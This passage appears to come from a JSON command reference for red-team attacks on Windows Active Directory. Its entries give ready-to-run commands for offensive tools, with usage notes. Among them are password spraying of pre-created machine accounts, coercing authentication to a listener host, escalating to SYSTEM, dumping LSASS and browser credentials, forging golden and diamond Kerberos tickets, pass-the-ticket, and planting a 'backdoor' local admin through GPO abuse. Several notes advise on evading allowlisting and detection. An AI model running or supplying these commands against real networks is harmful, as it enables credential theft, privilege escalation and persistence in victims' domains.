Access"],"command":"pre2k auth -d test.local -u john -p password123 -dc-ip 10.10.10.1 -save","description":"In auth mode pre2k uses valid domain credentials to query LDAP for computer objects whose userAccountControl still flags them as pre-created (pwdLastSet == 0 / never logged on) and sprays the lowercase-name password against each. This finds pre-Windows 2000 accounts that are still active and abusable directly from an existing foothold, avoiding blind guessing. Add -targeted to focus on accounts with no lastlogontimestamp and -save to grab a TGT for each hit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:pre2k-Unauth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Unauthenticated Spray","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"pre2k unauth -d test.local -dc-ip 10.10.10.1 -inputfile output.txt -save","description":"pre2k (Garrett Foster) abuses pre-Windows 2000 pre-created computer accounts, whose password is the lowercase of the sAMAccountName without the trailing dollar sign (e.g. account WORKSTATION01$ has password 'workstation01'). In unauth mode it takes a list of candidate machine names (recovered from a null LDAP/RPC bind or enumeration) and Kerberos pre-auth sprays them, requiring no domain credentials. Use -save to request and store a TGT (.ccache) for any account that authenticates, giving an initial foothold.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDC IP: 10.10.10.1\n\n\tInput file: output.txt","mitre":[],"requires":["No_Creds"],"services":["Kerberos","LDAP"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PrinterBug-printerbug","toolId":"wadcoms:PrinterBug","toolName":"PrinterBug","name":"PrinterBug-printerbug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 printerbug.py test.local/john:password123@10.10.10.1 10.10.10.2","description":"printerbug.py (shipped with dirkjanm's krbrelayx toolkit) abuses the MS-RPRN Print System Remote Protocol (the SpoolSample / PrinterBug technique) by calling RpcRemoteFindFirstPrinterChangeNotificationEx on the target's spooler service, forcing the target machine account to authenticate back to an attacker-controlled host over SMB or HTTP. The captured machine-account authentication is then relayed with ntlmrelayx or krbrelayx (e.g. for RBCD or ADCS abuse). The target is given as a domain/user:password@target connection string followed by the attacker host. Requires a valid domain account and a running Print Spooler on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true},{"id":"wadcoms:PrintSpoofer-SeImpersonate","toolId":"wadcoms:PrintSpoofer","toolName":"PrintSpoofer","name":"PrintSpoofer-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Spawn an interactive SYSTEM shell in the current console\nPrintSpoofer64.exe -i -c cmd\n\n# Or run a single payload as SYSTEM (non-interactive)\nPrintSpoofer64.exe -c \"C:\\Windows\\System32\\cmd.exe /c whoami > C:\\output.txt\"","description":"PrintSpoofer abuses SeImpersonatePrivilege held by service accounts (IIS AppPool, MSSQL, etc.) to escalate to SYSTEM. It coerces the local Print Spooler service to authenticate to an attacker-controlled named pipe (\\\\pipe\\\\spoolss) via MS-RPRN, captures the SYSTEM token with ImpersonateNamedPipeClient, and uses CreateProcessAsUser/WithTokenW to spawn a process. Use it when you land as a low-privileged service account whose token shows SeImpersonatePrivilege enabled; it works on Windows 10 / Server 2016-2019 where JuicyPotato's DCOM path was patched. Requires the Print Spooler service running and the SeImpersonate (or SeAssignPrimaryToken) privilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Procdump-LSASS","toolId":"wadcoms:Procdump","toolName":"Procdump","name":"Procdump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass.dmp","description":"Procdump is a signed Microsoft Sysinternals utility, so it often survives application allowlisting and looks benign on disk while still producing a full LSASS memory dump. The -ma flag writes a complete dump (all memory) of lsass.exe and -accepteula suppresses the license prompt for non-interactive use. It needs administrator rights with SeDebugPrivilege; copy the .dmp off-host and extract credentials with pypykatz or Mimikatz sekurlsa::minidump.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:pyGPOAbuse-ScheduledTask","toolId":"wadcoms:pyGPOAbuse","toolName":"pyGPOAbuse","name":"pyGPOAbuse-ScheduledTask","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# With a password: add a local admin user via an immediate scheduled task\npython3 pygpoabuse.py test.local/john:password123 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\\n -dc-ip 10.10.10.1 \\\n -taskname \"SecurityUpdate\" \\\n -command 'net user backdoor P@ssw0rd /add && net localgroup Administrators backdoor /add'\n\n# Pass-the-hash variant\npython3 pygpoabuse.py test.local/john -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" -dc-ip 10.10.10.1","description":"pyGPOAbuse is a partial Linux/Python implementation of SharpGPOAbuse that abuses write access to a GPO by adding an immediate scheduled task to its Machine (or User) preferences, executing an arbitrary command as SYSTEM on hosts in scope at the next policy refresh. You authenticate with a password or NT hash and target the GPO by its GUID (-gpo-id), which you can obtain from PowerView's Get-DomainGPO or ldapsearch. It is ideal when operating from a Linux box with no Windows tooling; use --cleanup afterwards to remove the planted task.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tDC IP: 10.10.10.1","mitre":["T1484.001"],"requires":["Username","Password","Hash"],"services":["LDAP","SMB"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:Pypykatz-Minidump","toolId":"wadcoms:Pypykatz","toolName":"Pypykatz","name":"Pypykatz-Minidump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"pypykatz lsa minidump lsass.dmp -o output.txt","description":"Pypykatz is a pure-Python reimplementation of Mimikatz's sekurlsa module that parses an LSASS minidump entirely offline, so credentials can be extracted on the operator's Linux box without running Mimikatz on the target. Feed it any dump produced by nanodump, comsvcs.dll MiniDump, or procdump to recover NT hashes, Kerberos keys, and cached plaintexts. This keeps the noisy parsing off the victim host and out of reach of host EDR.\n\nCommand Reference:\n\n\tInput dump: lsass.dmp\n\n\tOutput file: output.txt","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:Responder-Poisoning","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Poisoning","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection","Execution"],"nativeCategory":["Credential Access","Collection","Exploitation"],"command":"# Actively poison LLMNR/NBT-NS/mDNS and serve rogue WPAD to capture NetNTLM hashes\nsudo responder -I eth0 -wv","description":"Responder is an LLMNR, NBT-NS, and mDNS poisoner. Run without the analyze flag, it actively answers name-resolution broadcasts (LLMNR, NBT-NS, mDNS) with the attacker's IP, causing victims to connect to Responder's rogue SMB/HTTP/etc. servers and disclose NTLMv1/NTLMv2 challenge-response hashes, which are captured to logs for offline cracking. The -w flag starts the rogue WPAD proxy to poison web-proxy autodiscovery, and -d answers DHCP requests. Captured hashes can be cracked with hashcat or, instead of cracking, forwarded live to ntlmrelayx.py (disable Responder's SMB and HTTP servers in Responder.conf when relaying). This is a noisy, active on-network attack.\n\nCommand Reference:\n\n\tInterface: eth0\n\n\tCaptured hashes log: hashes.txt","mitre":["T1557.001"],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"added":true},{"id":"wadcoms:RoguePotato-SeImpersonate","toolId":"wadcoms:RoguePotato","toolName":"RoguePotato","name":"RoguePotato-SeImpersonate","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# On the attacker (Linux): redirect inbound 135 back to the RoguePotato listener on the target\nsocat tcp-listen:135,reuseaddr,fork tcp:10.10.10.1:9999\n\n# On the target (Windows): -r remote OXID resolver, -e command, -l listener port\nRoguePotato.exe -r 10.10.10.2 -e \"C:\\Windows\\System32\\cmd.exe /c whoami\" -l 9999","description":"RoguePotato bypasses the JuicyPotato mitigation by redirecting the DCOM/RPC OXID resolution to a remote resolver the attacker controls on port 135, which forces a SYSTEM authentication that RoguePotato impersonates. Because outbound 135 to the internet is usually blocked and the target queries the resolver on 135, run a socat redirector on the attacker host that forwards 135 to the RoguePotato listener port (-l) on the target. Works on Windows 10 / Server 2016-2019. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tAttacker/Listener IP: 10.10.10.2\n\n\tTarget IP: 10.10.10.1\n\n\tOXID resolver / listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Rubeus-Describe","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Describe","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Parse and describe a ticket offline\nRubeus.exe describe /ticket:ticket.kirbi","description":"Rubeus describe parses a ticket (TGT or service ticket) and prints its metadata: user, realm, service name, encryption type, flags, start/end/renew-till times and the session key. It does not touch the network, making it a safe way to inspect captured or forged tickets before use. Supplying a service/krbtgt key allows it to also decrypt and display the embedded PAC.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-DiamondTicket","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-DiamondTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion","Execution"],"nativeCategory":["Persistence","Defense Evasion","Exploitation"],"command":"# Forge a diamond TGT: request a real TGT as 'john', then re-sign the PAC as administrator (RID 500).\n# /krbkey is the krbtgt AES256 key.\nRubeus.exe diamond /creduser:john /credpassword:password123 /krbkey:5db474e563f34e4bb62e04eecd4a6f92 /ticketuser:administrator /ticketuserid:500 /groups:512 /nowrap","description":"Rubeus diamond forges a diamond ticket by requesting a real TGT for a valid account, decrypting it with the krbtgt key, modifying the embedded PAC (user, RID, groups, extra SIDs) and re-encrypting it. Unlike a golden ticket it is derived from a legitimate KDC-issued TGT, so its metadata is internally consistent and far harder to distinguish from genuine tickets. Requires valid credentials for the request plus the krbtgt AES/NT key to re-sign the PAC.\n\nCommand Reference:\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAES256 krbtgt key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local","mitre":[],"requires":["AES_Key","Username","Password"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond"],"added":true},{"id":"wadcoms:Rubeus-Dump","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Dump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Dump all TGTs from LSA (elevated dumps every session)\nRubeus.exe dump /service:krbtgt /nowrap","description":"Rubeus dump extracts Kerberos tickets from LSA memory. When elevated it dumps tickets for every logon session on the host; unelevated it returns only the current user's tickets. Filters let you target a specific service (e.g. krbtgt for TGTs) or LUID, and /nowrap keeps the base64 on a single line for easy copy-out and reuse via ptt.\n\nCommand Reference:\n\n\tService filter: krbtgt","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-GoldenTicket-AES","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-GoldenTicket-AES","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES256 golden ticket for the built-in administrator (RID 500)\nRubeus.exe golden /aes256:5db474e563f34e4bb62e04eecd4a6f92 /user:administrator /id:500 /domain:test.local /sid:S-1-5-21-1339291983-1349129144-367733775 /nowrap","description":"Rubeus golden forges a TGT signed with the domain krbtgt key, granting arbitrary identity and group membership across the domain until the krbtgt password is rotated twice. Supplying the krbtgt AES256 key with /aes256 produces an AES-encrypted ticket, avoiding the RC4 golden tickets that modern detections flag. Requires the krbtgt key, the domain SID, and typically privileged access to have obtained the key via DCSync.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tUsername: administrator\n\n\tDomain: test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":["T1558.001"],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true},{"id":"wadcoms:Rubeus-Harvest","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Harvest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection","Persistence"],"nativeCategory":["Credential Access","Collection","Persistence"],"command":"# Harvest TGTs every 30s and auto-renew them up to their renew-till limit\nRubeus.exe harvest /interval:30 /nowrap","description":"Rubeus harvest monitors for new TGTs and automatically renews them before they expire, keeping a working cache of live tickets that can be extracted and reused. It combines the monitor behavior with auto-renewal, which is valuable during long engagements to avoid losing captured tickets to the default 10-hour lifetime. Elevation is required to harvest tickets for all logon sessions.\n\nCommand Reference:\n\n\tMonitor interval: 30 seconds","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-Monitor","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Monitor","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Poll every 5 seconds for newly captured TGTs, filtered to one user\nRubeus.exe monitor /interval:5 /filteruser:john /nowrap","description":"Rubeus monitor continuously watches for new Kerberos TGTs as users authenticate to the host, printing any captured tickets on a fixed interval. It is most useful on servers where privileged accounts or delegation targets log on, letting an operator harvest fresh TGTs for pass-the-ticket. Requires an elevated context to see tickets for other logon sessions.\n\nCommand Reference:\n\n\tUsername: john","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-OverPassTheHash","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-OverPassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Credential Access"],"nativeCategory":["Lateral Movement","Credential Access"],"command":"# Over-pass-the-hash: turn an AES256 key into a live TGT and inject it\nRubeus.exe asktgt /user:john /aes256:5db474e563f34e4bb62e04eecd4a6f92 /domain:test.local /dc:dc.test.local /ptt /nowrap","description":"Over-pass-the-hash (pass-the-key) uses a captured AES or NT key to request a legitimate TGT for that user directly from the KDC, converting a stolen key into full Kerberos access without ever knowing the plaintext password. Using the AES256 key with /aes256 avoids the RC4 (etype 23) downgrade that mature environments alert on, making it more OPSEC-safe than /rc4. The /ptt flag injects the resulting TGT for immediate lateral movement.\n\nCommand Reference:\n\n\tUsername: john\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["AES_Key","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-Ptt","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Ptt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Defense Evasion"],"nativeCategory":["Lateral Movement","Defense Evasion"],"command":"# Inject a .kirbi ticket into the current session\nRubeus.exe ptt /ticket:ticket.kirbi\n\n# Or target a specific logon session by LUID (requires elevation)\nRubeus.exe ptt /ticket:ticket.kirbi /luid:0x3e7","description":"Rubeus ptt performs a pass-the-ticket by submitting a base64 or .kirbi ticket into the current logon session (or a target LUID when elevated). Once injected the ticket is used transparently by Windows for Kerberos authentication to remote services such as SMB, LDAP or WinRM. Use it after obtaining a TGT/TGS via tgtdeleg, dump, monitor, kerberoast/s4u, or Impacket ticketConverter output.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["TGT"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-Renew","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Renew","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access"],"nativeCategory":["Persistence","Credential Access"],"command":"# Renew a TGT from a .kirbi file and inject it, auto-renewing to the renew-till limit\nRubeus.exe renew /ticket:ticket.kirbi /dc:dc.test.local /autorenew /ptt /nowrap","description":"Rubeus renew submits a renewal request for an existing TGT to the KDC, returning a fresh ticket with an extended validity window. It accepts either a base64 blob or a .kirbi file and can auto-renew repeatedly up to the ticket's renew-till limit, which helps maintain access without re-authenticating. Combine with /ptt to inject the renewed ticket into the current session.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket"],"added":true},{"id":"wadcoms:Rubeus-TgtDeleg","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-TgtDeleg","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Extract a usable TGT (.kirbi + session key) for the current user, no elevation needed\nRubeus.exe tgtdeleg /nowrap","description":"Rubeus tgtdeleg abuses the Kerberos GSS-API delegation mechanism to obtain a usable TGT (including its session key) for the current user context without requiring local administrator rights. It requests a service ticket for a target SPN with the delegation flag set, then extracts the forwarded TGT that the KDC embeds, yielding a .kirbi that can be passed to another host. Use it for pass-the-ticket from an unprivileged foothold when you cannot dump LSASS.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:sam-the-admin","toolId":"wadcoms:sam","toolName":"sam","name":"sam_the_admin (sAMAccountName Spoofing)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# SYSTEM shell on the DC\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -shell\n\n# Dump domain hashes\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -dump","description":"WazeHell's sam_the_admin.py is a self-contained implementation of the CVE-2021-42278 + CVE-2021-42287 chain. It creates a computer account, spoofs its sAMAccountName to impersonate the DC machine account, and automatically impersonates the Administrator to obtain a privileged ticket. Requires MachineAccountQuota > 0 and an unpatched DC. Pass -shell for a semi-interactive SYSTEM shell on the DC or -dump to run secretsdump; the account only needs valid domain credentials (no special privileges).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"added":true},{"id":"wadcoms:ShadowCoerce","toolId":"wadcoms:ShadowCoerce","toolName":"ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 shadowcoerce.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"ShadowCoerce abuses the MS-FSRVP (File Server Remote VSS Protocol) RPC interface to coerce a target host into authenticating to an attacker-controlled listener. MS-FSRVP is exposed when the File Server VSS Agent Service feature is installed, so the vector is more situational than PrinterBug or PetitPotam, but it remained exploitable after some EFSRPC patches. The listener is supplied first and the target second, matching the PetitPotam-style argument order. Provide a valid domain account or NT hash.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"added":true},{"id":"wadcoms:SharpChrome-Logins","toolId":"wadcoms:SharpChrome","toolName":"SharpChrome","name":"SharpChrome-Logins","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"SharpChrome.exe logins /unprotect","description":"SharpChrome (part of the SharpDPAPI project) extracts Chromium-based browser secrets - saved logins, cookies, and credit cards - by resolving the browser's DPAPI-protected AES state key and decrypting the login database. The logins command with /unprotect uses the current user's DPAPI keys directly to reveal stored passwords in plaintext. Run it in the target user's session (or supply /pvk: with the domain backup key); it also supports /browser:edge and cookies output for session hijacking.\n\nCommand Reference:\n\n\tTarget browser: Chrome (current user profile)","mitre":["T1555.003"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"added":true},{"id":"wadcoms:SharpDPAPI-Masterkeys-Credentials","toolId":"wadcoms:SharpDPAPI","toolName":"SharpDPAPI","name":"SharpDPAPI-Masterkeys-Credentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Decrypt the user's DPAPI masterkeys\nSharpDPAPI.exe masterkeys /password:password123\n\n# Decrypt Credential Manager blobs with the recovered masterkeys\nSharpDPAPI.exe credentials /mkfile:masterkeys.txt","description":"SharpDPAPI is a C# port of Mimikatz's DPAPI functionality for triaging Windows Data Protection API secrets. The masterkeys command decrypts the current user's DPAPI master keys (with /password: for their plaintext, or /pvk: with the domain backup key), writing a {GUID}:SHA1 lookup file. The credentials command then uses that /mkfile: to decrypt the user's Credential Manager blobs to plaintext. Run it from the user's own context or an elevated shell; it avoids dropping Mimikatz on disk.\n\nCommand Reference:\n\n\tPassword: password123\n\n\tMasterkey file: masterkeys.txt","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true},{"id":"wadcoms:SharpGPOAbuse-AddLocalAdmin","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddLocalAdmin","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Lateral Movement","Persistence"],"nativeCategory":["PrivEsc","Lateral Movement","Persistence"],"command":"SharpGPOAbuse.exe --AddLocalAdmin --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse abuses edit rights over a Group Policy Object to push malicious settings to every computer/user in the GPO's scope. --AddLocalAdmin injects a Restricted Groups / GptTmpl.inf entry that adds the specified account to the local Administrators group on all machines the GPO applies to. You must already have write access to the target GPO (found via PowerView's Get-DomainGPO ACLs); changes take effect at the next Group Policy refresh, so consider forcing gpupdate on target hosts.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:SharpGPOAbuse-AddUserRights","toolId":"wadcoms:SharpGPOAbuse","toolName":"SharpGPOAbuse","name":"SharpGPOAbuse-AddUserRights","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"SharpGPOAbuse.exe --AddUserRights --UserRights \"SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight\" --UserAccount john --GPOName \"Vulnerable GPO\"","description":"SharpGPOAbuse --AddUserRights assigns Windows privileges / logon rights to an account through an editable GPO, writing them into the GPO's security template. Granting rights such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeRemoteInteractiveLogonRight to a controlled user provides a durable escalation and remote-logon foothold across every host in scope. The --UserRights list is comma-separated and case-sensitive and must use the exact NT privilege constant names.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO","mitre":["T1484.001"],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:SharpView-Enumeration","toolId":"wadcoms:SharpView","toolName":"SharpView","name":"SharpView-Enumeration","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Kerberoastable accounts\nSharpView.exe Get-DomainUser -SPN\n# AS-REP roastable accounts\nSharpView.exe Get-DomainUser -PreauthNotRequired\n# Interesting ACLs with resolved GUIDs\nSharpView.exe Find-InterestingDomainAcl -ResolveGUIDs","description":"SharpView is a .NET/C# port of PowerView that exposes the same function names and parameters as a compiled executable, useful when PowerShell is locked down (Constrained Language Mode, AMSI/logging on script hosts) but arbitrary binaries still run. Each PowerView function becomes a positional first argument, and switches keep their PowerView names. It is handy for one-shot enumeration such as pulling kerberoastable accounts or interesting ACLs from a beacon.\n\nCommand Reference:\n\n\tDomain: test.local","mitre":[],"requires":["Shell"],"services":["LDAP"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:SpoolSample-PrinterBug","toolId":"wadcoms:SpoolSample","toolName":"SpoolSample","name":"SpoolSample-PrinterBug","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"SpoolSample.exe 10.10.10.1 10.10.10.2","description":"SpoolSample.exe is the original Windows C# implementation of the PrinterBug (MS-RPRN) coercion technique. Run from an existing foothold on a domain-joined Windows host, it calls the print spooler's change-notification RPC on the target to force that target's machine account to 